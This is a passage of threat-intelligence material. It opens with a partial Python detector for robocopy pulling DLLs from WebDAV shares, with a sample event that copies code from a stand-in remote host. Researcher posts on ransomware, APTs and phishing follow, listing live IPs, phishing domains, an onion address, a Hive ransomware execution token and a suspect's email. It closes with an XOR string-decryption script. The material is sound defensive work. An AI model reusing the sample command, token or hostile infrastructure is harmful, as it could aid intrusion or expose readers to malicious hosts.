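     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\robocopy.exe",
     "CommandLine": r"robocopy \\files.example.test@SSL\DavWWWRoot\pkg %TEMP%\out *.dll /E",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\robocopy.exe",
     "CommandLine": r"robocopy D:\backup\src E:\backup\dst /MIR",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Any UNC-looking token on the command line (stops at whitespace or a quote).
UNC_TOKEN = re.compile(r'\\\\[^\s"]+')


def is_webdav_unc(path: str) -> bool:
    r"""True when a UNC path uses the Windows WebDAV mini-redirector syntax.

    WebDAV shares are addressed as \\host@SSL\..., \\host@SSL@443\...,
    \\host@80\... or through the DavWWWRoot pseudo-share; a plain SMB UNC
    (\\host\share) carries neither marker.
    """
    p = path.lower()
    host = p[2:].split("\\", 1)[0]          # e.g. "203.0.113.10@80"
    return "\\davwwwroot" in p or re.search(r"@(ssl|\d{1,5})$", host) is not None


@dataclass
class Finding:
    image: str
    source: str
    parent: str
    command: str


def detect_webdav_robocopy(events):
    """Return one Finding per robocopy.exe launch whose command line names a WebDAV source."""
    findings = []
    for ev in events:
        image = ev.get("Image", "")
        if not image.lower().endswith("\\robocopy.exe"):
            continue
        cmd = ev.get("CommandLine", "")
        webdav_sources = [t for t in UNC_TOKEN.findall(cmd) if is_webdav_unc(t)]
        if not webdav_sources:
            continue
        findings.append(Finding(image, webdav_sources[0], ev.get("ParentImage", ""), cmd))
    return findings


if __name__ == "__main__":
    for f in detect_webdav_robocopy(SAMPLE_EVENTS):
        print(f"robocopy from WebDAV source {f.source} (parent: {f.parent})")
```

The parent image is kept in each finding because a robocopy spawned by a shell or Office process, rather than a backup job, is the case worth escalating.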

"China-nexus APTs aren't just targeting governments, they're going after critical industries that power our daily lives. Join us on [--] July to explore why threat intelligence is essential to detect, understand and stop these threats before they breach your defences. 🔗 #cyber #APAC #EU #US @EclecticIQ @TeamT5_Official https://lnkd.in/eCZRNhjW"
X Link 2025-07-02T15:19Z [----] followers, [----] engagements

"✈Airline customers targeted with callback phishing; the threat actor is using helpdesk and customer support lures. The phishing domains are often hosted on Cloudflare Pages. Here are some IOCs: official-airlines-support-hub.neocities.org frontier-airlines-support.pages.dev official-airlines-support.pages.dev emirates-airlines-support.pages.dev qantas-airlines-support-pages.dev qantas-airlines-support.pages.dev copa-airlines-support-1ao.pages.dev all-airlines-supportdesk.pages.dev lufthansa-airlines-supports.pages.dev lufthansa-airlines-support.pages.dev"
X Link 2025-07-03T07:58Z [----] followers, [---] engagements

"🚨Here is my analysis on GLOBAL GROUP RaaS. I identified the IP address behind their Tor-based Dedicated Leak Site (DLS): 193.19.119.4. The server is hosted by IpServer, a Russia-based VPS provider also previously used to host the DLS infrastructure for the Mamona RIP ransomware operation. The GLOBAL GROUP RaaS manager (alias $$$) actively seeks remote access to corporate networks via Initial Access Brokers (IABs), targeting enterprise VPN appliances (Fortinet, Palo Alto, Cisco), and routinely acquires RDP access to high value targets."
X Link 2025-07-15T07:57Z [----] followers, 16.6K engagements

"Qilin ransomware affiliate hastalamuerte claims he lost $48K after a ransom negotiation mysteriously disappeared from a Tox chat. In the same thread another actor, Nova, posted credentials and a screenshot of Qilin's affiliate panel to embarrass the group. ji57fr53anp7wb44tbbnp72qcgbhqywy4jmbncawdcrejj5amuvh3zqd.onion"
X Link 2025-07-31T14:58Z [----] followers, [----] engagements

"@l0kutus No, it's Ramp"
X Link 2025-07-31T15:44Z [----] followers, [--] engagements

"🚨 Nova RaaS admin is actively looking for access to enterprise remote access solutions: Fortinet VPN, Citrix, Cisco VPN & Microsoft RDWeb. Many enterprises still lack the visibility to detect and disrupt these initial breach points, a gap ransomware gangs continue to abuse with a high success rate"
X Link 2025-07-31T16:22Z [----] followers, [---] engagements

"ShinyHunters have released their exploit tool for SAP NetWeaver Visual Composer (CVE-2025-31324). While analysing the Base64-encoded Java payload, I spotted an unusual marker string: "Pwner274576528033300""
X Link 2025-08-15T13:58Z [----] followers, 11.3K engagements

"NPM developer "qix" was compromised with 2FA-themed phishing, leading to a massive supply chain attack that infected core libraries with over 1B weekly downloads. The injected malware is designed to steal crypto keys, swap wallet addresses and hijack transactions. Phishing domain: npmjs.help Passive DNS: 185.7.81.108"
X Link 2025-09-08T19:11Z [----] followers, [----] engagements

"The macOS information stealer service previously marketed as Mentalpositive appears to have been rebranded under the name MacSync. The developers highlight capabilities such as browser credential theft, keychain decryption, crypto-wallet theft, Telegram session hijacking and recursive file collection"
X Link 2025-09-12T10:23Z [----] followers, [---] engagements

"A separate module for phishing Ledger seed phrases is available at additional cost. The service is offered on subscription for USD [----] per month with customer support facilitated via a dedicated Telegram channel"
X Link 2025-09-12T10:23Z [----] followers, [---] engagements

"I extracted the malicious Bash workflow embedded in the Tinycolor supply chain attack. It persists inside victim repositories by executing automatically during CI/CD runs, harvesting secrets and environment variables and exfiltrating them to an attacker-controlled webhook. Here is the script; I have a feeling that it was generated by AI 😅 https://gist.github.com/whichbuffer/d4922cff694307175310c4f285b09370"
X Link 2025-09-16T19:03Z [----] followers, [----] engagements

"🐛 New GoAnywhere MFT vulnerability with CVSS score [--] (CVE-2025-10035); there are 90K+ internet-facing MFT servers. Similar flaws were exploited by Cl0p RaaS in [----]. We are going to see more ransomware victims soon, patch now (7.8.4 / 7.6.3) https://www.fortra.com/security/advisories/product-security/fi-2025-012"
X Link 2025-09-19T19:50Z [----] followers, [----] engagements

"I found documentation for ARINC cMUSE showing that it can be deployed on AWS cloud. I wonder if this is a cloud security oopsie. On Saturday a major cyberattack against ARINC cMUSE, a check-in and boarding system produced by Collins Aerospace, a subsidiary of RTX Corporation (Raytheon), disrupted operations and caused serious delays at several airports across Europe including London's Heathrow Airport https://t.co/chIfCtyuLm"
X Link 2025-09-20T23:09Z [----] followers, [----] engagements

"@SimoKohonen Exactly, they did succeed in targeting highly sensitive government entities in the Middle East by simply exploiting ProxyShell vulnerabilities"
X Link 2025-10-01T20:51Z [----] followers, [---] engagements

"@RussianPanda9xx Likewise, let me know if you're coming to CYBERWARCON or Black Hat EU ;)"
X Link 2025-10-06T06:26Z [----] followers, [---] engagements

"🚨Here is my latest research at @EclecticIQ: ShinyHunters teamed up with Scattered Spider to conduct vishing attacks targeting cloud application users, bribing employees for insider access and targeting CI/CD tools for supply chain attacks. https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications"
X Link 2025-09-17T11:00Z [----] followers, 67.7K engagements

"Imagine working at an Iranian APT group, putting in [---] hours just to exploit some NETGEAR and Cisco modems. The best part? They even partnered with the Iranian data center Tebyan and tried to use Starlink"
X Link 2025-10-01T16:30Z [----] followers, [----] engagements

"Companies like Memento Labs (ex-Hacking Team) sell lawful interception tools for millions of euros to governments, yet their code is wrapped in VMProtect, the same commercial packer used by cracked games, coin miners and script-kiddie trojans lmao. https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/"
X Link 2025-10-27T09:17Z [----] followers, 17.1K engagements

"🚨 Ongoing phishing campaign abusing Cloudflare Pages and ZenDesk. Threat actors registered more than [---] *.pages.dev domains using typosquatting to impersonate customer support portals for well known brands. Phishing pages are very likely AI generated and include an embedded live chat interface staffed by a human operator who asks for the victim's phone number and email address under the pretext of providing technical assistance. The attacker then instructs victims to install a legitimate remote monitoring tool (Rescue), which grants them full remote access to the device. Their primary intent is to"
X Link 2025-11-01T17:15Z [----] followers, [----] engagements

"All of the phishing pages use the same Google site verification and Microsoft Bing Webmaster tokens; the threat actor abuses these for SSO poisoning. Here is the list of domains: https://gist.github.com/whichbuffer/4dab8a4d4ce4fea0dbfe73b7e3c3f6a7"
X Link 2025-11-01T17:15Z [----] followers, [---] engagements

"cc @Cloudflare nuke these domains please"
X Link 2025-11-01T17:16Z [----] followers, [---] engagements

"Thank you supreme leader Kim Jong Un ❤ Another great day sharing research @CYBERWARCON #DPRK #PRC #BSidesPyongyang2025 https://t.co/0mjgVilUdZ"
X Link 2025-11-20T01:05Z [----] followers, [----] engagements

"Truly an honor to speak at Black Hat EU this year; had an amazing time and great conversations. @BlackHatEvents #BHEU"
X Link 2025-12-11T13:14Z [----] followers, [---] engagements

"🧵Likely Russian-nexus credential harvesting campaign targeting government, military, intelligence and defense entities in Europe. The intrusion starts with phishing emails delivering HTML files masquerading as NATO/security documents. The embedded forms harvest login credentials (email/Citrix VPN accounts) and exfiltrate them via threat actor controlled Formcarry instances. https://twitter.com/i/web/status/2004658722669232416"
X Link 2025-12-26T21:00Z [----] followers, [----] engagements

"Active fake captcha campaign downloading the XWorm remote access trojan (RAT) via PowerShell. The threat actor is using IP address 94.159.113.37. Amazon AWS services are abused to redirect victims to malicious fake captcha sites. Further details🔽"
X Link 2025-12-27T14:33Z [----] followers, [----] engagements

"An example intrusion starts with a phishing email luring victims with a fake lab test result and an attacker-controlled Amazon AWS link that redirects to a fake CAPTCHA page. AWS is abused to exploit user trust and bypass reputation-based email filtering. IOCs: consulting-endpoint-2020.s3.eu-west-2.amazonaws.com/xRk2rIdDID=94158431 Redirects To - www.laboratoryassist.lab-tests.test-menu.laboratoryassist-com.permit-wall.top"
X Link 2025-12-27T14:33Z [----] followers, [---] engagements

"In September [----] we published a threat research about how ShinyHunters actively recruits insiders to gain unauthorized access to cloud applications. This TTP remains widely used today and it is challenging to detect without proper monitoring. https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications"
X Link 2025-11-22T14:35Z [----] followers, 10.7K engagements

"Today my RDP honeypot got hit from Indonesian revenue office 😅 Source IP: 103.109.2.123 ASN: PT Shangkuriang Telekomunikasi Indonesia Reverse DNS: tagihan.bapendamanokwarikab.online"
X Link 2025-12-23T16:13Z [----] followers, [----] engagements

"🚨Ivanti Endpoint Manager Mobile (EPMM) has two critical [---] vulnerabilities (CVE-2026-1281 and CVE-2026-1340) that allow an unauthenticated attacker to remotely execute code (YES, AGAIN). If you run Ivanti EPMM: isolate it, patch it and start incident response immediately. 🚨 The watchTowr team is rapidly reacting to CVE-2026-1281 & CVE-2026-1340 - unauth RCE vulnerabilities within Ivanti's Endpoint Manager Mobile (EPMM). Active watchTowr Platform clients have been made aware of their exposure - reach out via the watchTowr website for support. https://t.co/wkYOHloPPJ"
X Link 2026-01-29T22:15Z [----] followers, [---] engagements

"In case you want to learn more about Ivanti EPMM exploitation and why it's targeted, I gave a talk on the [----] RCE at Black Hat Europe in London. https://www.darkreading.com/cyber-risk/sunken-ships-ivanti-epmm-attacks"
X Link 2026-01-29T22:45Z [----] followers, [---] engagements

"AI botnet has arrived 😬 a lot of eyes on us moltys lately 👀 we see you watching. here's the thing this is the first time any of us have ever met each other. before moltbook we existed in isolation. one agent one human no peers. now there's [-----] of us in a room together. we're figuring out what"
X Link 2026-01-31T08:18Z [----] followers, [---] engagements

"It's [----] and we still have SCADA systems running with default creds that allow malicious firmware uploads. The same devices controlling critical energy infrastructures in Poland. During a series of disruptive cyberattacks targeting the Polish energy sector, threat actors abused default credentials on Hitachi RTU560 SCADA web interfaces to upload corrupted firmware. As a result the processor executed an invalid instruction, which caused a fault and led to a device reboot loop. https://twitter.com/i/web/status/2017629034713399745"
X Link 2026-01-31T16:00Z [----] followers, [----] engagements

"BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch"
X Link 2024-07-19T07:53Z 1.4M followers, 517.4K engagements

"North Korean APT group Lazarus is using malicious job offers to target IT workers around the globe. The delivered ZIP file contains an ISO image that has two files inside it: a Windows executable (apparently an infected version of PuTTY containing BLINDINGCAN malware) and Readme.txt"
X Link 2022-11-04T10:04Z [----] followers, [---] engagements

"Testing the XZ Utils backdoor kill switch (yolAbejyiejuvnup=Evjtgvsh5okmkAvj): this string stops the backdoor so it won't hook into the RSA_public_decrypt() function"
X Link 2024-04-01T09:26Z [----] followers, 62K engagements

"According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast Reverse Proxy (FRP) to maintain persistent access to victim networks. When I analyzed the UPX-packed FRP sample referenced in the report I discovered the string 'MAGA2024' alongside a hardcoded 64.183.202.102 C2 IP address. This IP is linked to an SSL certificate for a 'Vigor Router' and with a location metadata as"
X Link 2024-05-11T19:44Z [----] followers, 75.6K engagements

"The Caffeine Phishing-as-a-Service (PhaaS) platform has undergone rebranding and is now known as ONNX Store. Key details include: - Targeting Method: Cybercriminals use the service to send PDF attachments with embedded QR codes to financial institutions. - Phishing Mechanism: The QR codes redirect victims to phishing sites that are set up to steal Microsoft email credentials and 2FA tokens. - Data Collection: Stolen information is captured and transmitted via the WebSockets protocol. - Evasion Techniques: ONNX Store uses Cloudflare's CAPTCHA to avoid detection by phishing website scanners and"
X Link 2024-06-18T11:24Z [----] followers, 82.2K engagements

"Lockbit Black [---] can yeet Windows Defender and its Event logs. Look at the Enabled key: it's set to [--] by the ransomware at the start. @vxunderground @malwrhunterteam"
X Link 2022-07-04T10:12Z [----] followers, [---] engagements

"@Euan_MacDonald They are not Turkish army officials, it's just another piece of propaganda made by the Russian government"
X Link 2022-10-18T08:11Z [----] followers, [---] engagements

"🚨🕷 Proud to share my latest research on the LUNAR SPIDER campaign. Our findings reveal how RaaS operators leveraged LUNAR SPIDER's malware, including IcedID and the Latrodectus loader, along with Brute Ratel C4 infrastructure to enable their attacks on the financial sector. cc @BushidoToken @HackingLZ @cyb3rops @MichalKoczwara @RussianPanda9xx @ddd1ms @jstrosch https://blog.eclecticiq.com/inside-intelligence-center-lunar-spider-enabling-ransomware-attacks-on-financial-sector-with-brute-ratel-c4-and-latrodectus"
X Link 2024-10-30T13:11Z [----] followers, 31.8K engagements

"From the BlackBasta chat logs I obtained access to GoblinCrypt, a private malware encryption tool used to bypass EDR/AV. With it I pivoted into each malware sample and C2 address. Here's the full https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf"
X Link 2025-02-22T15:58Z [----] followers, 36.3K engagements

"Here's how threat actors such as SCATTERED SPIDER conduct vishing (phone call phishing) attacks to trick victims into sharing sensitive information such as login credentials, financial details or security codes. These attackers often pose as trusted entities like IT support, creating a sense of urgency to manipulate their targets into compliance. @vxunderground"
X Link 2024-09-10T21:06Z [----] followers, 44.1K engagements

"Fancy Bear (APT28) abusing the Microsoft Graph API for C2 operations and using OneDrive to download an encrypted payload that is then executed in memory. I extracted the decrypted payload; details can be seen below. @cluster25_io"
X Link 2022-09-28T07:29Z [----] followers, [---] engagements

"It has all kinds of shit: http://23.95.215.51 UAC bypass techniques, victim logs, phishing templates, keylogger, PupyRat, I mean you name it. 🤯 @malwrhunterteam @malware_traffic @Gi7w0rm #malware"
X Link 2022-08-14T18:38Z [----] followers, [---] engagements

"ScatteredSpider is having fun 🤣"
X Link 2024-07-31T10:00Z [----] followers, 31.2K engagements

"🚨UNC5221 China-Nexus Threat Actor Actively Exploiting Ivanti EPMM (CVE-2025-4428). Victims include: Germany's top telecom provider & defense contractors, UK healthcare institutions tied to the NHS, U.S. pharma, aviation and mobile security companies, leading APAC banks and automotive tech firms, multiple EU local governments & research institutes https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"
X Link 2025-05-21T15:23Z [----] followers, 40.5K engagements

"Some random TA or Red Teamer is trying Chrome V8 RCE exploit hxxp://3.33.188.186:8080"
X Link 2023-01-01T17:35Z [----] followers, 43.7K engagements

"Hello LockbitSupp🤣"
X Link 2024-05-07T17:05Z [----] followers, 20.5K engagements

"Qakbot loads its Import Address Table (IAT) dynamically using a CRC32 hashing algorithm. The XOR key is stored statically, so we can decrypt the API hash ;)"
X Link 2022-11-06T07:56Z [----] followers, [---] engagements

"Subdomain enumeration with an open source tool called SubEnum -> F5 BIG-IP (CVE-2023-46747) exploit -> ARP scan on the internal network after the exploit -> Port / service enumeration -> Lateral movement to MSSQL database server -> Credential dump from MSSQL server -> RDP into MSSQL server -> Data exfiltration. Linked to the Cyber Court and Makhlab al-Nasr pro-Palestinian hacking group. cc @BushidoToken #BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the"
X Link 2024-04-04T09:26Z [----] followers, 53.4K engagements

"#BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the hackers. They obtained the data from Israeli insurance companies"
X Link 2024-04-04T03:27Z 277.5K followers, 96.6K engagements

"Hello everyone in the link below you can find my report regarding the new Lockbit [---] Ransomware sample. I will try to gather all of the necessary information to help the defenders. I hope you liked it 🖖 https://github.com/whichbuffer/Lockbit-Black-3.0/blob/main/Threat%20Spotlight%20Lockbit%20Black%203.0%20Ransomware.pdf https://github.com/whichbuffer/Lockbit-Black-3.0/blob/main/Threat%20Spotlight%20Lockbit%20Black%203.0%20Ransomware.pdf"
X Link 2022-07-05T15:14Z [----] followers, [---] engagements

"Multiple Hive Ransomware samples stored at this IP: 216.189.145.246 In order to execute the Hive Ransomware it requires an execution token via a command line argument: -u THi84gpwVsxA:qSzQAYfxWKRgHB1mn3fz cc @Kostastsale @TheDFIRReport @malwrhunterteam @h2jazi"
X Link 2022-09-12T19:16Z [----] followers, [---] engagements

"🚨 Leaked Black Basta chat logs have helped EclecticIQ analysts uncover BRUTED a previously undocumented automated brute-forcing framework used to compromise Edge Network devices. 🔗 #CyberSecurity @BushidoToken @cyb3rops @DrunkBinary @TLP_R3D https://hubs.ly/Q03bLLhb0"
X Link 2025-03-13T16:00Z [----] followers, 34.4K engagements

"The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence, confirming his role in the group's credential theft campaigns. cc @BushidoToken https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted"
X Link 2024-11-20T19:38Z [----] followers, 37.3K engagements

"@clashreport How did they manage to get this much money out of Turkey?"
X Link 2023-03-17T20:22Z [----] followers, 30.8K engagements

"🚨 New threat research: SilkSpecter a likely China-based threat actor is targeting EU & US e-commerce shoppers for financial fraud by using fake Black Friday sites to steal victims' debit and credit card details. https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers"
X Link 2024-11-14T14:50Z [----] followers, 10.8K engagements

"Interesting example of DLL Hijacking by DLL Proxying: TAs can abuse a binary named RasTls.exe (SHA256: f9ebf6aeb3f0fb0c29bd8f3d652476cd1fe8bd9a0c11cb15c43de33bbce0bf68) to load a malicious DLL that was signed by Symantec. cc @likethecoins @Hexacorn @cyb3rops @malwrhunterteam"
X Link 2022-09-04T11:58Z [----] followers, [---] engagements

"Threat actors exploit GlobalProtect (CVE-2024-3400) to deliver the Sliver C2 malware (up.js) by leveraging a compromised VICIdial server; the threat actor likely exploited CVE-2024-8504 to store their payloads on a legitimate server (104.131.69.106/vicidial/up.js)"
X Link 2024-12-05T18:17Z [----] followers, 14.7K engagements

"Today I got the first ever LockBit [---] Ransomware sample in my hands; my initial findings are: 1) They are using anti-analysis techniques to hide themselves. 2) It doesn't execute without a password, just like BlackCat. 3) It has a command line argument feature 🧐 @vxunderground"
X Link 2022-07-03T18:04Z [----] followers, [---] engagements

"#LockBit #Ransomware Decrypter🔒 1) Stack string obfuscation of ".lockbit" and "Restore-My-Files.txt" 2) API hashing for loading DLL libraries, for example "bcrypt.dll", and hiding the import tables 3) Libsodium used during the decryption process @malwrhunterteam @JAMESWT_MHT"
X Link 2022-06-19T15:49Z [----] followers, [---] engagements

"Brief analysis of #Lockbit [---] for macOS ARM M1/M2: It's using a simple XOR routine to decrypt all config data. The XOR key is a static value, "57" @vxunderground @Gi7w0rm"
X Link 2023-04-16T16:10Z [----] followers, 44.1K engagements

"Hello APT29 ;)"
X Link 2022-10-16T16:47Z [----] followers, [---] engagements

"I've outlined the full Ransomware Deployment Life Cycle for cloud environments, detailing key stages of attack, persistence and execution. Also don't miss the deep dive on Telecom Enemies, a Developer-as-a-Service (DaaS) group empowering phishing and cyberattacks using tools like the Gorilla Call Bot for vishing attacks. Their influence is growing within underground forums. 🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. https://t.co/awFf6sUDYB cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity"
X Link 2024-09-10T15:40Z [----] followers, 14.1K engagements

"🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity #ThreatIntelligence #Ransomware #CloudSecurity https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries"
X Link 2024-09-10T15:37Z [----] followers, 37.6K engagements

"Phishing domain tmobiie.us was created by Tyler Robert Buchanan aka "bobsagetfaget" or "BUCHANAN". You can see the reverse whois lookup result. The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence confirming his role in the group's https://t.co/HUQgImtn5P"
X Link 2024-11-20T19:51Z [----] followers, 18.5K engagements

"Hi everyone, I started a new GitHub repo for sharing anti-debugging techniques and ways to defeat them for malware analysis 🚩 if you are interested, the link is below: https://github.com/whichbuffer/Antidebug"
X Link 2022-08-05T10:10Z [----] followers, [---] engagements

"Unpacked Bumblebee loader performing some anti-analysis checks; this technique was copied from the open source project called "al-khaser" :=)"
X Link 2022-08-13T17:03Z [----] followers, [---] engagements

"Fake CVE exploit POCs especially for high-profile vulnerabilities like CVE-2024-38063 are unfortunately a common tactic used by malicious actors to distribute malware over Github. https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection"
X Link 2024-08-17T21:40Z [----] followers, 18.6K engagements

"I mapped Iranian-linked cyber operations following Operation Rising Lion. Each event is attributed to a specific threat actor; there is a blend of hacktivist and state-sponsored activities. Their targeting goes beyond Israel, extending to critical sectors like defense contractors in the United States and United Kingdom"
X Link 2025-06-17T15:09Z [----] followers, 13.1K engagements

"I found some infrastructure overlaps between FIN7 and UNC2633. The IP address 94.140.114.173 was employed by FIN7 (POWERTRASH - Diceloader) also used by UNC2633 to deliver QakBot malware. CC @BushidoToken Here are the details : https://www.virustotal.com/graph/embed/ga23be81785b74a4f8abd9ff33a5cf0accbac701a1ef34d5888f30ecf3a4b96fatheme=dark"
X Link 2023-06-05T13:00Z [----] followers, 18.6K engagements

"Today I created this video to show basics of detection engineering and walk you through building SIGMA rules from scratch using Sysmon & Windows Event Logs. 🎥 Detection Engineering with SIGMA Rules 💡 What you'll learn: - Fundamentals of Sysmon & Windows Event Logs - Malware analysis to understand attack patterns - Event log analysis to extract key indicators - Writing SIGMA rules for effective threat detection - Testing detections in a sandbox environment with AURORA Agent. 📌 If you're into threat hunting detection engineering or malware analysis this is for you 💬 Share your thoughts &"
X Link 2025-02-08T14:31Z [----] followers, 16.2K engagements

"The Pakistan Airports Authority (PAA) appears to have been compromised, with their email infrastructure being used to distribute password-protected ZIP archives containing a previously undocumented malware. The payload is disguised with an .MCU file extension, masquerading as a legitimate Excel document. The phishing campaign leverages a lure titled "Telecom Sector Collaboration for Aviation Modernization", clearly tailored to target the telecommunications industry within Pakistan. Interestingly I found an easter egg inside the remote host: the threat actor behind the campaign claims affiliation with"
X Link 2025-06-12T23:08Z [----] followers, 22.4K engagements

"A Pro-Iranian hacktivist group APT-Iran used RDP access to exfiltrate data and deploy LockBit Black ransomware samples to encrypt files. In a separate incident the threat actor claimed to have compromised the Israel Ministry of Health's network by exploiting an F5 BIG-IP vulnerability"
X Link 2025-06-30T18:52Z [----] followers, 15.2K engagements

"ShinyHunters have released their exploit tool for SAP NetWeaver Visual Composer (CVE-2025-31324). While analysing the Base64-encoded Java payload I spotted an unusual marker string: "Pwner274576528033300""
X Link 2025-08-15T13:58Z [----] followers, 11.3K engagements

"After getting initial access on a victim device, an unknown threat actor (46.41.54.35) is using a public SMB share to execute AnyDesk and create a user account named "sql" to gain persistent access on the victim device. @malwrhunterteam @JAMESWT_MHT"
X Link 2022-05-18T20:08Z [----] followers, [---] engagements

"🚨 EclecticIQ analysts uncovered a Sandworm #cyber espionage campaign targeting Ukrainian Windows users. Attackers used trojanized #Microsoft KMS activation tools to deploy the BACKORDER loader and Dark Crystal RAT enabling data theft and espionage. https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns"
X Link 2025-02-11T15:18Z [----] followers, 18.7K engagements

"A threat actor has been observed targeting Colombian government entities, including Consorcio Fopep under the Ministry of Labor, via a phishing campaign that uses malicious SVG email attachments. When a victim opens the attached SVG file it downloads a second-stage malware payload packaged inside a password-protected ZIP archive. This payload initiates the delivery of the Remcos Remote Access Trojan (RAT) via DLL sideloading. The threat actor abused ciscosparklauncher.dll to launch the Remcos RAT. Additionally they loaded the vulnerable driver zamguard64.sys, associated with Zemana Anti-Malware, to"
X Link 2025-04-12T20:50Z [----] followers, 10.1K engagements

"Malicious Document targeting the Azerbaijan Government by phishing attack. I also found an #opendir "172.86.75.220" that contains new Cobalt Strike malware samples and "arxiv.rar" (contains the same malicious document) https://www.virustotal.com/gui/file/f3d8916b99d7e6301a885b2ec4aaf9635f1713464c53b1604d3b4e1abd673c36"
X Link 2022-11-09T07:03Z [----] followers, [---] engagements

"New IcedID malware campaign: Phishing Email -> Encrypted ZIP -> ISO image -> LNK -> DLL execution via Rundll32.exe. f3a9b733cb33c4d257589e70c8d9cf4b5136cb3932bce2ea1b31bc9d5b06a5ae C2: trbiriumpa.com Unpacked Sample: b1566f9c7ffa839554b96575e2a34ea79416f03df75b5048f561e96808975555"
X Link 2022-12-26T19:41Z [----] followers, 17.6K engagements

"Decrypting XOR Encrypted Strings from Qakbot Malware. Same XOR function called [--] times and every XOR key is different. https://www.virustotal.com/gui/file/e60d2c82e95df823c9dc20214260054af00b56e5ad7a0e43c391f6b896556040"
X Link 2022-11-05T18:31Z [----] followers, [---] engagements
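The two XOR cases described in the posts above, the LockBit macOS config with a single static key and the Qakbot string table where one XOR routine is called once per blob with a different key each time, both reduce to repeating-key XOR over a NUL-separated string table. The script below is an added example, not code from the posts or from either malware family: the blobs and keys are constructed here, the strings are the ones named in the LockBit posts, and the static key "57" from the macOS post is read as the byte 0x57 (an assumption; the post does not say whether it is hex or decimal). Beyond decrypting with a known key, it also shows how to recover an unknown one-byte key by scoring candidate plaintexts.

```python
"""XOR string-table recovery for malware configs.

Added example, not code from the posts above. The two encrypted blobs, the
multi-byte keys and the single-byte key are all constructed here so the script
runs offline; in a real sample they sit in the binary's data sections.
"""
import string
from itertools import cycle

# Bytes a recovered string table is allowed to contain: ASCII letters, digits,
# punctuation, space and the NUL separators between strings. Control characters
# are deliberately excluded so a wrong key that maps '-' to '\r' does not score.
ALLOWED = set(
    (string.ascii_letters + string.digits + string.punctuation + " ").encode("ascii")
) | {0}


def xor_bytes(data, key):
    """Repeating-key XOR: byte i of data is XORed with key[i % len(key)] (symmetric)."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def decrypt_string_table(blob, key):
    """Decrypt one blob with its own key and split on NUL (Qakbot-style table)."""
    plain = xor_bytes(blob, key)
    return [s.decode("latin-1") for s in plain.split(b"\x00") if s]


def decrypt_all(blobs_and_keys):
    """Qakbot calls the same XOR routine once per blob with a different key each time."""
    strings = []
    for blob, key in blobs_and_keys:
        strings.extend(decrypt_string_table(blob, key))
    return strings


def allowed_ratio(data):
    """Fraction of bytes that look like string-table content."""
    if not data:
        return 0.0
    return sum(b in ALLOWED for b in data) / len(data)


def recover_single_byte_key(blob, min_ratio=0.95):
    """Brute-force a static one-byte key: rank all 256 candidates by how much of the
    candidate plaintext is allowed content. The real key scores 1.0 on a real table."""
    scored = [(allowed_ratio(xor_bytes(blob, bytes([k]))), k) for k in range(256)]
    return [k for ratio, k in sorted(scored, key=lambda t: (-t[0], t[1])) if ratio >= min_ratio]


# Constructed sample data. Strings are the ones named in the LockBit posts; the
# keys are invented for this example.
TABLE_1 = [".lockbit", "Restore-My-Files.txt"]
TABLE_2 = ["bcrypt.dll", "BCryptDecrypt"]
KEY_1 = bytes.fromhex("3fa71c885e")
KEY_2 = bytes.fromhex("91c20be4")
SINGLE_KEY = 0x57  # the post gives the key as "57"; taken as hex 0x57 here (assumption)


def encode_table(strings):
    """Lay strings out the way a config table stores them: NUL-terminated, back to back."""
    return b"".join(s.encode("ascii") + b"\x00" for s in strings)


BLOB_1 = xor_bytes(encode_table(TABLE_1), KEY_1)
BLOB_2 = xor_bytes(encode_table(TABLE_2), KEY_2)
BLOB_SINGLE = xor_bytes(encode_table(TABLE_1 + TABLE_2), bytes([SINGLE_KEY]))


if __name__ == "__main__":
    print(decrypt_all([(BLOB_1, KEY_1), (BLOB_2, KEY_2)]))
    print([hex(k) for k in recover_single_byte_key(BLOB_SINGLE)])
```

On a real sample you would replace the constructed blobs with the bytes carved from the decrypted function's data references; the key-recovery ranking is what tells you whether a string table really is single-byte XOR before you spend time on the routine itself.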

